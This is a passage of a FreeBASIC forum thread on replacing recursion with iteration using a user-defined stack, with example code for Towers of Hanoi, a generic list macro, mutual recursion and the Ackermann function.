Compile and run the program by pressing F9.'=============================================================================Screen 9'\\$STACK 32766 ' allocate plenty of stack space since it's a recursive programDeclare Sub DisplayMoveConst X  = 1   ' named constants used for indexing and screen positioningConst Y  = 0Const PromptLine = 24   ' named constant indicating line for all user promptsConst MaxDisks   = 13   ' named constant indicating maximum number of disksConst CursorOff  = 0Dim Shared RecursionDepth As Integer' global variable declarationsDim Shared NumberOfDisks(1 To MaxDisks + 1) As Integer, SourceTower(1 To MaxDisks + 1)As IntegerDim Shared TargetTower(1 To MaxDisks + 1)As Integer, Disk(1 To MaxDisks + 1)As StringDim Shared DisksPosition(MaxDisks,1)As Integer, TowerHeight(1 To 3)As IntegerDim Shared As Integer NumberOfMoves = 0               ' used to keep track of number of moves madeDim Shared As Integer BottomLine    = 24              ' used to indicate bottom line of displayDim Shared As Integer TowerBase     = 2Sub Init   ' This procedure is used to initialize the screen and get the number    ' of disks to use.    Dim c As Integer    Color 7, 0                              ' initialize screen color    Cls    Color 4, 0    Locate 1, 26, CursorOff    Print \"TOWERS OF HANOI\"                 ' display the program banner    Color 6, 0    Locate PromptLine, X, CursorOff    Print \"Number of Disks (1 TO \" + Str(MaxDisks) +  \") \";    Do   ' get the number of disks from the user        Locate PromptLine, Len(\"Number of Disks (1 TO \" + Str(MaxDisks) +  \") \") + 1, CursorOff        Input NumberOfDisks(1)        If NumberOfDisks(1) > MaxDisks Then Beep    Loop Until NumberOfDisks(1) <= MaxDisks    TowerBase = TowerBase + NumberOfDisks(1)    Color 7, 0    Locate PromptLine, X, CursorOff    Print Space(79)                        ' clear prompt lineEnd Sub  ' end procedure InitSub DisplayGameScreen  ' This procedure displays a message on the screen    Locate 1, 26,CursorOff              ' position the cursor and turn it on    Color 4, 0                            ' set the display color    Print \"TOWERS OF HANOI FOR\"; NumberOfDisks(1); \"DISKS\"    Locate TowerBase + 1, X, CursorOff   ' position the cursor    Color 1, 0                              ' set the display color    Print String(80,176);                  ' display a bar on the screen    Color 7,0                               ' set the display colorEnd Sub  ' end procedure DisplayGameScreenSub MakeMoves(Byref  NumMoves As Integer)        RecursionDepth=RecursionDepth+1    ' check if we should exit routine    If NumberOfDisks(RecursionDepth) = 0 Then                RecursionDepth=RecursionDepth-1        Exit Sub    End If        NumberOfDisks(RecursionDepth + 1) = NumberOfDisks(RecursionDepth) - 1    SourceTower(RecursionDepth + 1) = SourceTower(RecursionDepth)    TargetTower(RecursionDepth + 1) = 6 - _    SourceTower(RecursionDepth) - TargetTower(RecursionDepth)    MakeMoves(NumMoves)    NumMoves= NumMoves+1        DisplayMove    NumberOfDisks(RecursionDepth + 1) = NumberOfDisks(RecursionDepth) - 1    SourceTower(RecursionDepth + 1) = 6 - _    SourceTower(RecursionDepth) - TargetTower(RecursionDepth)    TargetTower(RecursionDepth + 1) = TargetTower(RecursionDepth)    MakeMoves(NumMoves)    RecursionDepth=RecursionDepth-1    End Sub Sub DisplayMove    sleep 14-NumberOfDisks(1)    Dim column As Integer        If TargetTower(RecursionDepth) = 1 Then        Column = 1    Elseif TargetTower(RecursionDepth) = 2 Then        
Column = 27    Elseif TargetTower(RecursionDepth) = 3 Then        Column = 54    End If        ' go to the position of the next disk to move    Locate DisksPosition(NumberOfDisks(RecursionDepth),Y), _    DisksPosition(NumberOfDisks(RecursionDepth),X), CursorOff    Color 7,0    Print Space(26)      ' erase current disk        ' increment the height of the tower the disk is moving to        TowerHeight(SourceTower(RecursionDepth))=TowerHeight(SourceTower(RecursionDepth))+1    ' position cursor at top of destination tower    Locate TowerHeight(TargetTower(RecursionDepth)), Column, CursorOff        ' get the color    Color NumberOfDisks(RecursionDepth) Mod 14 + 1,0    Print Disk(NumberOfDisks(RecursionDepth));   ' display the disk        Color 7,0        ' update the current position of this disk    DisksPosition(NumberOfDisks(RecursionDepth),Y) = _    TowerHeight(TargetTower(RecursionDepth))    DisksPosition(NumberOfDisks(RecursionDepth),X) = Column        ' decrement the height of the tower the disk came from    TowerHeight(TargetTower(RecursionDepth)) = _    TowerHeight(TargetTower(RecursionDepth)) - 1End Sub ' start of main programInit' initialize the array of disksFor X1 As Integer = 1 To NumberOfDisks(1)        ' for the number of disks    Disk(X1) = String(26,32)  ' fill the array with spaces    Mid(Disk(X1), MaxDisks + 1 - X1, X1 * 2 - 1) = String(30,219)Next X1' display the initial disksDim Top As Integer = TowerBase - NumberOfDisks(1)For X1 As Integer = 1 To NumberOfDisks(1)    DisksPosition(X1,Y) = Top + X1      ' assign row display    DisksPosition(X1,X) = 1              ' assign column display    Locate Top + X1, 1,CursorOff' position cursor    Color X1 Mod 14 + 1,0       ' change color    Print Disk(X1);            ' display the current diskNext X1Sleep 1000DisplayGameScreen         ' display game screenTowerHeight(1) = Top              ' initialize global variablesTowerHeight(2) = TowerBaseTowerHeight(3) = TowerBaseSourceTower(1) = 1TargetTower(1) = 3RecursionDepth = 0Locate 1, 1,CursorOff Print \"Start time: \" ;Int(Timer)MakeMoves( NumberOfMoves) ' start gameLocate 2, 1,CursorOff Print \"Stop time : \"; Int(Timer)Locate PromptLine, 26Print \"DONE IN \"; NumberOfMoves; \" MOVES\";SleepEnd  ' end of program  `\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nThanks\nIncrease the sleep time in DisplayMove() is more demonstrative.\nLost Zergling\nPosts: 240\nJoined: Dec 02, 2011 22:51\nLocation: France\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nHello fxm. First of all thank you because this post is didactic, clear, precise and neutral. I'm a little 'offtopic', to see but in any case on the recursion. As you may have noticed, in my list manipulation tools I use two competing recursive techniques in 'nodeflat', and I am very interested in the possible tracks to optimize the operation. You have already helped me a lot with the simple idea of ​​a global variable to track the deallocations (it's silly but I just did not think). The typical recursion case I am thinking of is the path of a tree and the recursive (backward) path is initiated by the kinematics of the pointers, in which case it is the tree itself that serves as a user stack (virtually linearized). 
But since the nodeflat instruction must be able to take place (or not) in a recursion already itself iterated and therefore interrupted (hashstep), then the actually recursive mode allows to have reverse recursion to the request even outside of the hashstep loop, with the same instruction. I do not dare to touch this code, but I have the intuition that it could perhaps be optimized. I have another problem: I introduced a recursion in the hashtag and my tests seem to show a threshold effect impacting overall performance, but it's stealthy: would it come from recursion, a test , the size of the property, I have difficulty to determine it accurately. So far new hashTag is slower than previous, but the reason why is very difficult to identify.\nLost Zergling\nPosts: 240\nJoined: Dec 02, 2011 22:51\nLocation: France\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\n@fxm : slowdown fixed - this one wasn't due to a recursive call.\nPosts: 1461\nJoined: May 24, 2007 22:10\nLocation: The Netherlands\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nI have modified you stack implementation for other purposes, I hope you don't mind.\n\nCode: Select all\n\n`#macro listTypeCreate(list_type, data_type)   type list_type      public:      declare property push(byval value as data_type)      declare property pop() as data_type      declare property size() as integer 'stack size      declare property find(byval value as data_type) as integer      declare property get(index as integer) as data_type      declare destructor()      private:      dim as data_type list(any) 'stack      dim as integer current = 0   end type   'increase list size + add value   property list_type.push(byval value as data_type)      redim preserve list(ubound(list) + 1)      list(ubound(list)) = value   end property   property list_type.pop() as data_type      dim as data_type value      select case ubound(list)      case is > 0         'get value + decrease list size         value = list(ubound(list))         redim preserve list(ubound(list) - 1)      case is = 0         'get value + empty list         value = list(ubound(list))         erase list      case else         'keep uninitialised value      end select      return value   end property   property list_type.size() as integer      return ubound(list) + 1   end property   'find first match   property list_type.find(byval value as data_type) as integer      for i as integer = lbound(list) to ubound(list)         if list(i) = value then return i       next      return -1   end property   property list_type.get(index as integer) as data_type      dim as data_type value      if index >= lbound(list) and index <= ubound(list) then         value = list(index)      end if      return value    end property   destructor list_type      erase list   end destructor#endmacrolistTypeCreate(listTypeUlong, ulong)dim as listTypeUlong listlist.push = 111 'property asignment formatlist.push = 333list.push(333)list.push(555)print \"list.size() = \"; list.size()?print \"list.find(333) = \"; list.find(333)print \"list.find(555) = \"; list.find(555)print \"list.find(888) = \"; list.find(888)?for i as integer = -1 to list.size() - 1 + 1   print \"list.get(\" + str(i) + \") = \"; list.get(i)next?while list.size() > 0   print \"list.pop() = \"; list.pop()wend?print \"list.size() = \"; list.size()`\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, 
FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nNo problem. Everyone has the right to be inspired by code on the forum (like my first version of user stack) and modify it as it sees fit.\n\nMyself, I yesterday modified it, but just to gain speed of execution!\n(important when we want to replace the execution stack by its own stack)\nSee the first post, at the beginning of paragraph 2.2).\nmarcov\nPosts: 2762\nJoined: Jun 16, 2005 9:45\nLocation: Eindhoven, NL\nContact:\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nThis describes auto-recursion, but maybe it would be fun to work out a mutual recusion (or even a more complex one like a recursive descent expression parser) case? I've seen factorials linearized often, but the demonstrations always are for the simpler cases.\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nI think that there is no fundamental problem for mutual recursive procedures.\nFrom mutual recursive procedures to iterative stacking procedures:\n- the first step consists in transforming the recursive procedures into \"final\" recursive procedures (see the \"final\" definition at paragraph 2.2.2 of my article),\n- then, the method is similar than that already described, with besides an additional parameter (an index) which is also pushed on the user stack in order to select the right code body to execute when pulling data from the stack,\n- therefore, each iterative procedure contains the translation (for stacking) of all code bodies from the recursive procedures.\nSimple \"even/odd\" functions for example:\n\nCode: Select all\n\n`Declare Function recursiveIsEven(Byval n As Integer) As BooleanDeclare Function recursiveIsOdd(Byval n As Integer) As BooleanFunction recursiveIsEven(Byval n As Integer) As Boolean  If n = 0 Then    Return True  Else    Return recursiveIsOdd(n - 1)  End IfEnd FunctionFunction recursiveIsOdd(Byval n As Integer) As Boolean  If n = 0 Then    Return False  Else    Return recursiveIsEven(n - 1)  End IfEnd Function#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Function iterativeIsEven(Byval n As Integer) As Boolean  Dim As Integer i = 1  Dim As DynamicUserStackTypeForInteger S  S.push = n : S.push = i  While S.used > 0    i = S.pop : n = S.pop    If i = 1 Then      If n = 0 Then        Return True      Else        S.push = n - 1 : S.push = 2      End If    Elseif i = 2 Then      If n = 0 Then        Return False      Else        S.push = n - 1 : S.push = 1      End If    End If  WendEnd FunctionFunction iterativeIsOdd(Byval n As Integer) As Boolean  Dim As Integer i = 2  Dim As DynamicUserStackTypeForInteger S  S.push = n : S.push = i  While S.used > 0    i = S.pop : n = S.pop    If i = 1 Then      If n = 0 Then        Return True      Else        S.push = n - 1 : S.push = 2      End If    Elseif i = 2 Then      If n = 0 Then        Return False      Else        S.push = n - 1 : S.push = 1      End If    End If  WendEnd FunctionPrint recursiveIsEven(16), recursiveIsOdd(16)Print recursiveIsEven(17), recursiveIsOdd(17)PrintPrint iterativeIsEven(16), iterativeIsOdd(16)Print iterativeIsEven(17), iterativeIsOdd(17)PrintSleep`\n\nBut by cons I think that there is a big problem for a nested recursive 
procedure.\n\"Ackermann\" function for example:\n\nCode: Select all\n\n`Function Ackermann (Byval m As Integer, Byval n As Integer) As Integer  If m = 0 Then    Return n + 1  Else    If n = 0 Then      Return Ackermann(m - 1, 1)    Else      Return Ackermann(m - 1, Ackermann(m, n - 1))    End If  End IfEnd Function`\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nfxm wrote:But by cons I think that there is a big problem for a nested recursive procedure.\n\"Ackermann\" function for example:\n\nIn fact, the solution is quite simple:\n- use 2 independent storage stacks, one for the first parameter \"m\" and another for the second parameter \"n\" of the function, because of the nested call on one parameter,\n- 'Return expression' is transformed into a pushing the expression on the stack dedicated to the parameter where the nesting call is,\n- therefore a 'Return' of data popping from the same stack is added at code end.\n\nCode: Select all\n\n`Function recursiveAckermann (Byval m As Integer, Byval n As Integer) As Integer  If m = 0 Then    Return n + 1  Else    If n = 0 Then      Return recursiveAckermann(m - 1, 1)    Else      Return recursiveAckermann(m - 1, recursiveAckermann(m, n - 1))    End If  End IfEnd Function#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Function iterativeAckermann (Byval m As Integer, Byval n As Integer) As Integer  Dim As DynamicUserStackTypeForInteger Sm, Sn  Sm.push = m : Sn.push = n  While Sm.used > 0    m = Sm.pop : n = Sn.pop    If m = 0 Then      Sn.push = n + 1                                    ' Return n + 1 (and because of nested call)    Else      If n = 0 Then        Sm.push = m - 1 : Sn.push = 1                    ' Return Ackermann(m - 1, 1)      Else        Sm.push = m - 1 : Sm.push = m : Sn.push = n - 1  ' Return Ackermann(m - 1, Ackermann(m, n - 1))      End If    End If  Wend  Return Sn.pop                                          ' (because of Sn.push = n + 1)End FunctionPrint recursiveAckermann(3, 0), recursiveAckermann(3, 1), recursiveAckermann(3, 2), recursiveAckermann(3, 3), recursiveAckermann(3, 4)Print iterativeAckermann(3, 0), iterativeAckermann(3, 1), iterativeAckermann(3, 2), iterativeAckermann(3, 3), iterativeAckermann(3, 4)Sleep`\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nAdded at the header article these previous two examples of translation from recursion to iteration (for mutual recursion, and for nested recursion) in a last paragraph (2.2.3)." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7395909,"math_prob":0.9051611,"size":33790,"snap":"2019-35-2019-39","text_gpt3_token_len":8566,"char_repetition_ratio":0.2041378,"word_repetition_ratio":0.31899703,"special_character_ratio":0.26069844,"punctuation_ratio":0.11464557,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9901656,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-20T17:17:07Z\",\"WARC-Record-ID\":\"<urn:uuid:8f2348d3-92f3-4b41-847c-afff09b26094>\",\"Content-Length\":\"127772\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6c1d020e-0e96-4617-86ea-3339389a2aff>\",\"WARC-Concurrent-To\":\"<urn:uuid:2e6bb52c-2785-4da5-b992-a96c1c64ce80>\",\"WARC-IP-Address\":\"198.252.100.173\",\"WARC-Target-URI\":\"https://www.freebasic.net/forum/viewtopic.php?f=9&t=27026&amp\",\"WARC-Payload-Digest\":\"sha1:R47RAGSK4NL3IDOL647XWIMGKQS4VPHN\",\"WARC-Block-Digest\":\"sha1:RW22NHTKAGN3OYZRY7LNSYUDMLJKLA2X\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514574050.69_warc_CC-MAIN-20190920155311-20190920181311-00306.warc.gz\"}"}
https://www.osh.net/calc/yards-to-meters/192
[ "# What is 192 yards in meters?\n\n192 yards = 175.56 meters\n\nConvert another measurement\n\n## Formula for converting yards to meters\n\nThe formula for converting yards to meters is yards / 1.093613. So for a distance of 192 yards, the formula would be 192 / 1.093613, with a result of 175.56 meters.\n\n## Look up numbers near 192\n\n← Prev num Next num →\n191 193" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9717619,"math_prob":0.96298635,"size":258,"snap":"2023-40-2023-50","text_gpt3_token_len":72,"char_repetition_ratio":0.20866142,"word_repetition_ratio":0.045454547,"special_character_ratio":0.36821705,"punctuation_ratio":0.15517241,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98036486,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-21T07:43:40Z\",\"WARC-Record-ID\":\"<urn:uuid:0ace0d5f-44c1-44e9-ba60-5a9b8219b7c1>\",\"Content-Length\":\"11573\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b0222d17-a9ba-4dad-9f4e-326c0be7f085>\",\"WARC-Concurrent-To\":\"<urn:uuid:ce3465e2-5826-42c7-83cf-d1aba5ec7be9>\",\"WARC-IP-Address\":\"35.209.4.189\",\"WARC-Target-URI\":\"https://www.osh.net/calc/yards-to-meters/192\",\"WARC-Payload-Digest\":\"sha1:H3SWHJIVDETGXSIBL74UTB366YLNOHH4\",\"WARC-Block-Digest\":\"sha1:AI2RCAXSFUY3RO45IQ6I7EU7W2ZW5R4D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233505362.29_warc_CC-MAIN-20230921073711-20230921103711-00768.warc.gz\"}"}
https://docs.microsoft.com/en-us/office/troubleshoot/excel/isblank-function-return-false
[ "# The result is \"FALSE\" when you use the ISBLANK() function in an Excel spreadsheet\n\n## Symptoms\n\nWhen you use the ISBLANK() function in a Microsoft Excel spreadsheet, the result is \"FALSE\". This behavior occurs even though the cell appears to be empty. Additionally, this behavior occurs even though the formula bar may show that nothing is in the cell.\n\n## Cause\n\nThis behavior may occur when the cell contains a zero-length string. A zero length string may be a result of the following conditions:\n\n• A formula.\n• A copy and paste operation.\n• A cell that contains a zero-length string is imported from a database that supports zero-length strings and that contains zero-length strings.\n\n## Workaround\n\nTo work around this issue, clear the zero-length string from the cell. To do this, select the cell, click Edit, and then click Clear All.\n\nIn addition, you can also check whether a cell contains a zero-length string by using the LEN function. For example, if the cell you are checking is A1, the formula will be =OR(Len(A1)=0, Isblank(A1))." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8150986,"math_prob":0.6784782,"size":1588,"snap":"2019-51-2020-05","text_gpt3_token_len":344,"char_repetition_ratio":0.17234848,"word_repetition_ratio":0.037453182,"special_character_ratio":0.21536525,"punctuation_ratio":0.11111111,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96389896,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-09T21:24:53Z\",\"WARC-Record-ID\":\"<urn:uuid:a08b5baf-34be-4a49-99bd-f1a9f0faa62d>\",\"Content-Length\":\"37118\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:406233c9-b921-41cd-b385-834538a4af6e>\",\"WARC-Concurrent-To\":\"<urn:uuid:3aad3f59-9a37-4f81-b63f-c3cf50ecccf1>\",\"WARC-IP-Address\":\"104.86.81.75\",\"WARC-Target-URI\":\"https://docs.microsoft.com/en-us/office/troubleshoot/excel/isblank-function-return-false\",\"WARC-Payload-Digest\":\"sha1:LWZF7QWO3ZC3M6EPUQSPIUNODPRI6VS4\",\"WARC-Block-Digest\":\"sha1:N52RCTPYDD2HD6QCJSYBIM7HE7JNAGDZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540523790.58_warc_CC-MAIN-20191209201914-20191209225914-00078.warc.gz\"}"}
https://users.rust-lang.org/t/possible-to-write-own-version-of-operator-or-some-equivalent-macro/43546/3
[ "", null, "# Possible to write own version of `?` operator or some equivalent macro?\n\nHello,\n\nFirstly, am loving Rust so far!! I'm not advanced at all at programming, so I may be making some stupid mistakes/design choices. For this reason, let me explain my intent, in case I'm thinking about the problem wrong!\n\nI am writing an API that interfaces with WASM (without wasm_bindgen) and so (at least for now) every communication has to be using `i32`s.\n\nFrequently, my WASM facing functions accept as parameters `id: i32, x: i32, y: i32` and turn those into custom data types `Id` and `Point` for use within my program.\n\nI want every WASM facing function to return some kind of message (equivalent to `Ok` or `Err`) I'm going with `0 as i32` for Ok and `-1 as i32` for Err. I don't know how I am going to deal with `bool`, but that's another matter.\n\nNow, here's the problem:\n\n``````fn get_id_point(id: i32, x: i32, y: i32) -> Result<(Id, Point), &'static str> {\nlet id = Id::from(id)?;\nlet point = Point::from(x, y)?;\nOk((id, point))\n}\n\n// example function which uses get_id_point(), but eventually will be many functions\n#[no_mangle]\npub unsafe extern \"C\" fn place(id: i32, x: i32, y: i32) -> i32 {\nlet (id, pos) = if let Ok((id, pos)) = get_id_point(id, x, y) {\n(id, pos)\n} else {\nreturn -1;\n};\n// ...\n0 // everything good, return 0\n}\n``````\n\nI will want every function to produce `Id` and `Point` variables (`let (id, pos)`), but I have 5 lines of boilerplate (and a helper function) for each function to do so.\n\nIs there a better approach where with one line I either get the two variables or I return early with a `-1`?\n\nSure.\n\n``````macro_rules! int_try {\n(\\$value:expr) => {\nmatch \\$value {\nOk(out) => out,\nErr(_) => return -1,\n}\n};\n}\n\n#[no_mangle]\npub unsafe extern \"C\" fn place(id: i32, x: i32, y: i32) -> i32 {\nlet (id, pos) = int_try!(get_id_point(id, x, y));\n0\n}\n``````\n\nDamn Alice, you make programming look easy!\n\nThank you!\n\n1 Like\n\nThe ? operator started life as the `try!()` macro, Welsh basically looked like this.\n\nwhich?\n\nYes" ]
[ null, "https://aws1.discourse-cdn.com/business5/uploads/rust_lang/original/2X/e/e260a60b8dca4dae6ce7db98c45bb5008e6fdc62.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85096693,"math_prob":0.9157072,"size":1525,"snap":"2020-34-2020-40","text_gpt3_token_len":430,"char_repetition_ratio":0.1078238,"word_repetition_ratio":0.014134276,"special_character_ratio":0.3062295,"punctuation_ratio":0.1810089,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9603721,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-05T02:51:44Z\",\"WARC-Record-ID\":\"<urn:uuid:cd2088a1-739e-418d-a409-27fae018171a>\",\"Content-Length\":\"24853\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:16aaf3d8-7673-4513-8cda-c3b6c75206a0>\",\"WARC-Concurrent-To\":\"<urn:uuid:7e7eff5a-7cde-4f6e-b87f-1c01e40f33d1>\",\"WARC-IP-Address\":\"72.52.80.20\",\"WARC-Target-URI\":\"https://users.rust-lang.org/t/possible-to-write-own-version-of-operator-or-some-equivalent-macro/43546/3\",\"WARC-Payload-Digest\":\"sha1:XVLRY6MJXAJKTA4YJFF4MENKVTATM5TO\",\"WARC-Block-Digest\":\"sha1:QRIPOKROOWQIWZ3FCYVKCYDNV6SRNA4I\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439735906.77_warc_CC-MAIN-20200805010001-20200805040001-00403.warc.gz\"}"}
https://im.kendallhunt.com/MS/teachers/1/6/7/preparation.html
[ "# Lesson 7\n\nRevisit Percentages\n\n### Lesson Narrative\n\nStudents learned about what percentages are and how to solve certain problems in an earlier unit. At the time, they did not learn an efficient procedure for finding $$B$$ in “$$A\\%$$ of $$B$$ is $$C$$” given $$A$$ and $$C$$, because they didn't have an efficient way to solve an equation of the form $$px=q$$. Now they do, so we briefly revisit this type of problem.\n\n### Learning Goals\n\nTeacher Facing\n\n• State explicitly what the chosen variable represents when creating an equation.\n• Use equations to solve problems involving percentages and explain (orally) the solution method.\n• Write equations of the form $px=q$ or equivalent to represent situations where the amount that corresponds to 100% is unknown.\n\n### Student Facing\n\nLet's use equations to find percentages.\n\n### Student Facing\n\n• I can solve percent problems by writing and solving an equation.\n\nBuilding On" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9034197,"math_prob":0.9988152,"size":944,"snap":"2020-34-2020-40","text_gpt3_token_len":206,"char_repetition_ratio":0.12978724,"word_repetition_ratio":0.0,"special_character_ratio":0.22245763,"punctuation_ratio":0.06875,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999565,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-23T00:40:52Z\",\"WARC-Record-ID\":\"<urn:uuid:75accfcd-6cef-43a3-b8a2-9c02ea8e72ba>\",\"Content-Length\":\"55540\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ae11d58b-d14f-4c48-9967-c0b179a4eb83>\",\"WARC-Concurrent-To\":\"<urn:uuid:67ae1aa1-bc16-4fdf-a2cf-6601fbc6351f>\",\"WARC-IP-Address\":\"54.88.63.64\",\"WARC-Target-URI\":\"https://im.kendallhunt.com/MS/teachers/1/6/7/preparation.html\",\"WARC-Payload-Digest\":\"sha1:5EM2ZWBCZDRKY5JMPNUZ6R6RGXF4ZJFW\",\"WARC-Block-Digest\":\"sha1:UMCMJMZ7M5J6XKWGUH3AN2BC7HEJBKBK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400208095.31_warc_CC-MAIN-20200922224013-20200923014013-00120.warc.gz\"}"}
https://introprogramming.info/english-intro-csharp-book/read-online/chapter-26-sample-programming-exam-topic-3/
[ "# Chapter 26. Sample Programming Exam – Topic #3\n\nIn the present chapter we will review some sample exam problems and suggest solutions for them. While solving the problems we will stick to the advices given in the chapter \"Methodology of Problem Solving\".\n\n## Mind Maps\n\nProblem 1: Spiral Matrix\n\nWith a given number N (input from the keyboard) generate and print a square matrix containing the numbers from 0 to N2-1, located as a spiral beginning from the center of the matrix and moving clockwise starting downwards (look at the examples).\n\nSample output for N=3 and N=4:\n\nStart Thinking on the Problem\n\nIt’s obvious from the requirement that we are given an algorithmic problem. Contriving the appropriate algorithm for filling up the square matrix cells in the required way is the main part of the solution to the problem. We will demonstrate to the reader the typical reasoning needed for solving this particular problem.\n\nInventing an Idea for the Solution\n\nThe next step is to think up the idea for the algorithm, which we will implement. We must fill the matrix with the numbers from 0 to N2-1 and we may immediately notice that this could be made by a loop, which puts one of the numbers in the supposed cell of the matrix at each iteration. We first put 0 at its place, then put 1 at its place, then put 2, and so on until we finish with putting N2-1 at its place.\n\nLet’s suppose we know the starting position – the one we have to put the first number on (the zero). That’s how the problem is reduced to finding a method for determining each of the next positions, which we must put a number at – this is our primary subtask.\n\nWe try to find an approach for determining the next to the current position: we search a strict regularity for changing the indices during the traversal of the cells. It looks like the directions of the numbers are changed from time to time, right? First the direction if down, then the direction is changed to left, later to up, then to right then again to down. Changing of the directions is always clockwise and the initial direction is always downwards.\n\nIf we define an integer variable direction that holds the current moving direction, it will take sequentially the values 0 (down), 1 (left), 2 (up), 3 (right) and then again 0, 1, 2, … Looking at the problem examples (for N=3 and N=4) we can conclude that the direction stays down for some time, then changes to left, stays some time, then changes to up, stays some time, etc. We can assume that with changing the moving direction we can increase the value of direction by one and take its remainder of division by 4. Thus the next direction after 3 (right) will be 0 (down).\n\nThe next step is to determine when the moving direction changes: what is the number of moves in each direction. This may take some time. We can take a sheet of paper and test few hypotheses we might have.\n\nFrom the two examples we can see that the number of moves in the consequent directions does form special sequences: for N=3 à 1, 1, 2, 2, 2 and for N=4 à 1, 1, 2, 2, 3, 3, 3. This means that for N=3 we move 1 cell down, then 1 cell left, then 2 cells up, then 2 cells right and finally 2 down. For N=4, the process is the same. 
We found an interesting dependency which can evolve into an algorithm for filling the spiral matrix.\n\nIf we write down a bigger matrix of the same type on a sheet of paper, we will see that the sequence of the direction changes follows the same pattern: the numbers of moves increase by 1 at an interval of two, and the last number does not increase.\n\nIt seems we have an idea for solving the problem: start from the middle of the matrix and move 1 cell down, 1 cell left, 2 cells up, 2 cells right, 3 cells down, 3 cells left, etc. During the moving we can fill the numbers from 0 to N²-1 consecutively into the cells we visit.\n\nChecking the Idea\n\nLet’s check the idea. First we need to find the starting cell and make sure we can determine it correctly. If N is odd, the starting cell seems to be the absolute center cell of the matrix. We can check this for N=1, N=3 and N=5 on a sheet of paper, and it turns out to be correct. If N is an even number, the starting cell is located up and to the right of the central point of the matrix, i.e. it is the upper-right one of the four cells around the center (for example for a matrix of size 4 x 4).\n\nNow let’s check the matrix filling algorithm. We take for example N=4. Let’s start from the starting cell. The first direction is down. We go down 1 cell, then left 1 cell, then up 2 cells, then right 2 cells, then down 3 cells, then left 3 cells and finally up 3 cells. For simplicity we can let the last move run until the entire matrix is filled and stop at that moment. On a sheet of paper we can draw a small sketch of the algorithm by hand and trace how it works during the idea checking process.\n\nAfter sketching the algorithm on a sheet of paper for N = 1, 2 and 3 we see that it works correctly. It seems the idea is correct and we can think about how to implement it.\n\nData Structures and Efficiency\n\nLet’s start with choosing the data structure for implementing the matrix. It’s appropriate to have direct access to each element of the matrix, so we will choose a two-dimensional array matrix of integer type. When starting the program we read from the standard input the dimensionality n of the matrix and initialize it as follows:\n\nint[,] matrix = new int[n, n];\n\nIn this case the choice of a data structure is unambiguous. We will keep the matrix in a two-dimensional array. We have no other data. We will not have problems with the performance because the program will make as many steps as there are elements in the matrix.\n\nImplementation of the 